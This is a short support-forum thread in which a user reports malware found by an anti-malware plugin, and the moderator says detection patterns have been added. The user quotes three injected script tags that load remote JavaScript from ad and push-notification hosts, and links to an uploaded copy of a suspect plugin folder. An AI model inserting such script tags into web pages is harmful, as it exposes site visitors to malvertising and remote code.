HSEO malware

Home Forums Support Forum HSEO malware

This topic contains 1 reply, has 2 voices, and was last updated by  Anti-Malware Admin 2 days, 5 hours ago.

Viewing 2 posts - 1 through 2 (of 2 total)
  • Author
    Posts
  • May 11, 2026 at 3:47 am #172591

    ram’s
    Member

    Hello and thanks for your plugin!
    It found this code that it has quarantined:

    <script>(function(s,u,z,p){s.src=u,s.setAttribute(‘data-zone’,z),p.appendChild(s);})(document.createElement(‘script’),’https://iclickcdn.com/tag.min.js’,3336627,document.body||document.documentElement)</script>
    <script src=”https://asoulrox.com/pfe/current/tag.min.js?z=3336643″ data-cfasync=”false” async></script>
    <script type=”text/javascript” src=”//inpagepush.com/400/3336649″ data-cfasync=”false” async=”async”></script>

    However, it didn’t find the HSEO folder in the plugins, which seems to be a malware. I’ve uploaded the folder here: https://www.swisstransfer.com/d/ca7ee527-8203-4799-8fff-dcd701d56e87

    Thanks!

    May 13, 2026 at 7:11 am #172749

    Anti-Malware Admin
    Moderator

    Thank you for posting this new rogue plugin code to me. I have added the pattern of this new threat to my definition updates so that it can now be found and automatically fixed with my plugin scan. Please let me know if you find any more like this.

  • Author
    Posts
Viewing 2 posts - 1 through 2 (of 2 total)

You must be logged in to reply to this topic.

Comments are closed.